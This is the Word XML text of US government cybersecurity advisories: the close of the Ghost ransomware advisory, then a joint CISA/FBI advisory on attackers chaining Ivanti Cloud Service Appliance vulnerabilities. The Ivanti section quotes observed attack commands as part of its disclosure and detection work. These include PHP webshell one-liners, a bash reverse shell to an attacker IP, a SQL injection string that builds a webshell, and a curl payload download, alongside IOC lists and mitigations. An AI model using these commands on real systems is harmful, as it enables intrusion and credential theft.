        <w:t>Implement the principle of least privilege when granting permissions so that employees who require access to PowerShell are aligned with organizational business requirements.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, alert on, and investigate abnormal network activity. Ransomware activity generates unusual network traffic across all phases of the attack chain. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Organizations that can successfully identify and investigate this activity are better able to interrupt malicious activity before ransomware is executed [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ghost actors run a significant number of commands, scripts, and programs that IT administrators would have no legitimate reason for running. Victims who have identified and responded to this unusual behavior have successfully prevented Ghost ransomware attacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Limit exposure of services by disabling unused ports such as, RDP 3398, FTP 21, and SMB 445, and restricting access to essential services through securely configured VPNs or firewalls.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enhance email security by implementing advanced filtering, blocking malicious attachments, and enabling DMARC, DKIM, and SPF to prevent spoofing [CPG 2.M]. Validate Security Controls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addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 3 to Table 13). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process. Reporting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Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.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FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files.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Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators.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FBI, CISA, and MS-ISAC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI's Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency's Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1- 844-729-2472). Disclaimer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information in this report is being provided "as is" for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC. Version History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February 19, 2025: Initial version.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.02.19 20:51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications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Release Date January 22, 2025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Alert Code AA25-022A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Organizations and Cyber Safety, Cyber Threats and Advisories, Incident Detection, Response, and Prevention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Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025- 0282 and CVE-2025-0283) in Ivanti's Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025- 0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways. Summary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The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE- 2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.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CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors' primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE- 2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE- 2024-9379. In one confirmed compromise, the actors moved laterally to two servers.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All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]</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Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third- party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.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Download the PDF version of this report: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AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 756.92 KB )</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a downloadable copy of IOCs, see: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AA25-022A STIX XML (XML, 105.56 KB )</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AA25-022A STIX JSON (JSON, 76.91 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 16. See the MITRE ATT&amp;CK Tactics and Techniques section of this advisory for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques.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September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1] CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims' network and execute arbitrary commands on the appliance [T1219].[2][3] CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1] CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]</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Ivanti's advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.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CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE- 2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim-other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures. Exploit Chain 1</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threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.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some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6} located in the /tmp directory to decrypt the credentials prior to exfiltration-this tool was unrecoverable.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obtaining credentials, the actors logged in and exploited CVE-2024- 9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].</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one confirmed compromise, the threat actors tried to create webshells using two different paths: echo "&lt;?php system(@ \$_REQUEST['a']);"&gt;/opt/ivanti/csa/broker/webroot/client/help.php echo "&lt;?php system('/bin/sudo '. @ \$_REQUEST['a']);" &gt; /opt/landesk/broker/webroot/gsb/help.php</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same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i &gt;&amp;/dev/tcp/107.173.89[.]16/8000 0&gt;&amp;1.</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In another compromise, the threat actors maintained their presence on the victim's system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used. Lateral Movement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one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002]. Exploit Chain 2</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one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.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the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk&gt;&gt;/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.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inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk&gt;&gt;./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful. Detection of Activity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incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations' rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions. Victim Organization 1</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first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement. Victim Organization 2</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organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement. Victim Organization 3</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organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity. Indicators of Compromise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See Table 1 through Table 3 for IOCs related to the threat actors' exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024- 9380 in Ivanti CSA.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Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.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 IP Address Used for Credential Theft, September 2024 File Name IP Address Description "/client/index.php%3f.php/gsb/datetime.php 142.171.217[.]195 /var/log/messages "/client/index.php%3f.php/gsb/datetime.php 154.64.226[.]166 /var/log/messages-20240904.gz "/client/index.php%3f.php/gsb/datetime.php 216.131.75[.]53 "/client/index.php%3f.php/gsb/datetime.php 23.236.66[.]97 /var/log/messages-20240905.gz "/client/index.php%3f.php/gsb/datetime.php 38.207.159[.]76 /var/log/messages-20240906.gz</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2: Survey 2, Ivanti CSA Network IOC List, September 2024 File Name IP Address Description 149.154.167[.]41 95.161.76[.]100 hxxps://file.io/E50vtqmJP5aa hxxps://file.io/RBKuU8gicWt hxxps://file.io/frdZ9L18R7Nx hxxp://ip.sb</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hxxps://pan.xj.hk/d/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6401646e701f5f47518ecef48a308a36/redis 142.171.217[.]195 108.174.199[.]200 206.189.156[.]69 108.174.199[.]200/Xa27efd2.tmp 142.171.217[.]195</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Table 3: Additional IOCs Derived from Incident Response, September 2024 Type IOC Description Ipv4 107.173.89[.]16 Ipv4 38.207.159[.]76 Ipv4 142.171.217[.]195 Ipv4 154.64.226[.]166 Ipv4 156.234.193[.]18 Ipv4 216.131.75[.]53 Ipv4 205.169.39[.]11 Ipv4 23.236.66[.]97 Ipv4 149.154.176[.]41 Ipv4 95.161.76[.]100 Ipv4 142.171.217[.]195 Ipv4 108.174.199[.]200 Ipv4 206.189.156[.]69 Ipv4 142.171.217[.]195 Ipv4 67.217.228[.]83 Ipv4 203.160.72[.]174 Ipv4 142.11.217[.]3 Ipv4 104.168.133[.]228 Ipv4 64.176.49[.]160 Ipv4 45.141.215[.]17 Ipv4 142.171.217[.]195 Ipv4 98.101.25[.]30 Ipv4 216.131.75[.]53 Ipv4 134.195.90[.]71 Ipv4 23.236.66[.]97 Hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a50660fb31df96b3328640fdfbeea755 Hash 53c5b7d124f13039eb62409e1ec2089d Hash 698a752ec1ca43237cb1dc791700afde Hash aa69300617faab4eb39b789ebfeb5abe Hash c2becc553b96ba27d60265d07ec3bd6c Hash cacc30e2a5b2683e19e45dc4f191cebc /opt/ivanti/csa/broker/webroot/client/help.php Hash 061e5946c9595e560d64d5a8c65be49e /opt/landesk/broker/webroot/gsb/view.php Hash</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e35cf026057a3729387b7ecfb213ae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62a611f0f1a418876b11c9df3b56885bed /tmp/brokerdebug Hash c7d20ca6fe596009afaeb725fec8635f /opt/landesk/broker/webroot/gsb/help.php Hash F7F81AE880A17975F60E1E0FE1A4048B /opt/landesk/broker/webroot/gsb/DateTimeTab.php Hash 86B62FFD33597FD635E01B95F08BB996 /opt/landesk/broker/webroot/gsb/style.php Hash DD975310201079CACD4CDE6FACAB8C1D /opt/landesk/broker/webroot/client/index.php Hash 1B20E9310CA815F9E2BD366FB94E147F</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/sbin/systemd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Configuration file at /WpService.conf Hash 30f57e14596f1bcad7cc4284d1af4684</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/sbin/systemd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Configuration file at /WpService.conf URL hxxps://file.io/E50vtqmJP5aa URL hxxps://file.io/RBKuU8gicWt URL hxxps://file.io/frdZ9L18R7Nx URL hxxp://ip.sb URL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hxxps://pan.xj.hk/d/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6401646e701f5f47518ecef48a308a36/redis URL 108.174.199.200/Xa27efd2.tmp URL 45.33.101.53/log URL 45.33.101.53/log2 URL 208.184.237.75/fdsupdate URL 173.243.138.76/fdsupdate URL cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun URL cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun domain gg.oyr2ohrm.eyes[.]sh domain ggg.oyr2ohrm.eyes[.]sh domain gggg.oyr2ohrm.eyes[.]sh domain txt.xj[.]hk domain book.hacktricks[.]xyz host sh -c setsid /dev/shm/redis &amp; host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sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o</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/dev/shm/redis2 host sh -c mv /dev/shm/redis2 /dev/shm/redis host sh -c rm /dev/shm/* host rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis host 78cc672218949a9ec87407ad3bcb5db6 Agent.zip host d13f71e51b38ffef6b9dc8efbed27615 Log.log host d88bfac2b43509abdc70308bef75e2a6 Log.exe host R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) R.exe host ae51c891d2e895b5ca919d14edd42c26 CAService.exe host d88bfac2b43509abdc70308bef75e2a6 Lgfxsys.exe host f82847bccb621e6822a3947bc9ce9621 NetlO.cfg host c894f55c8fa9d92e2dd2c78172cff745 XboVFyKw.tmp host MD5: Unknown Wi.bat host MD5: Unknown dCUgGXfm.tmp host MD5: Unknown DijZViHC.tmp CrowdStrike Falcon e09fef2f502a41c199046219a6584e8d CrowdStrike falcon cid /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock -- localtime --systohc /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool --fullList Ipv4 142.171.217[.]195 Ipv4 107.173.89[.]16 Ipv4 192.42.116[.]210 Ipv4 82.197.182[.]161 Ipv4 154.213.185[.]230 Ipv4 216.131.75[.]53 Ipv4 23.236.66[.]97 Ipv4 208.105.190[.]170 Ipv4 136.144.17[.]145 Ipv4 136.144.17[.]133 Ipv4 216.73.162[.]56 Ipv4 104.28.240[.]123 Ipv4 163.5.171[.]49 Ipv4 89.187.178[.]179 Ipv4 163.5.171[.]49 Ipv4 203.160.86[.]69 Ipv4 185.220.69[.]83 Ipv4 185.199.103[.]196 Ipv4 188.172.229[.]15 Ipv4 155.138.215[.]144 Ipv4 64.176.49[.]160 Ipv4 185.40.4[.]38 Ipv4 216.131[.]75.53 Ipv4 185.40.4[.]95 MITRE ATT&amp;CK Tactics and Techniques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See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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4: Reconnaissance Technique Title ID Use Active Scanning: Vulnerability Scanning T1595.002 Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.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5: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications.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6: Execution Technique Title ID Use Command and Scripting Interpreter T1059 Threat actors abused command and script interpreters to execute commands, scripts, or binaries.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7: Persistence Technique Title ID Use Modify Authentication Process T1556 Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations' networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Server Software Component: Web Shell T1505.003 Threat actors executed code to implant webshells for persistence.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8: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server.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9: Defense Evasion Technique Title ID Use Hide Artifacts: Hidden Users T1564.002 Threat actors acted as a hidden user to disguise their presence on a system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deobfuscate/Decode Files or Information T1140 Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.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10: Credential Access Technique Title ID Use Unsecured Credentials: Credentials in Files T1552.001 Threat actors harvested encrypted admin credentials to gain further access.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11: Lateral Movement Technique Title ID Use Exploitation of Remove Services T1210 Threat actors exploited CSAs via remote services to gain access to an organization's networks by leveraging programming errors, EOL systems, and operating systems.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12: Command and Control Technique Title ID Use Remote Access Software T1219 Threat actors attempted to remotely authenticate into a victim's network and execute arbitrary commands on the appliance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application Layer: Web Protocol T1071.001 Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens.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13: Exfiltration Technique Title ID Use Exfiltration TA0010 Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use. Incident Response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If compromise is detected, the authoring agencies recommend that organizations: Quarantine or take offline potentially affected hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reimage compromised hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Provision new account credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Report the compromise to CISA via CISA's 24/7 Operations Center (report@cisa.gov or 888-282-0870). Mitigations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CISA and FBI recommend organizations: Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Secure remote access tools by: Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</w:t>
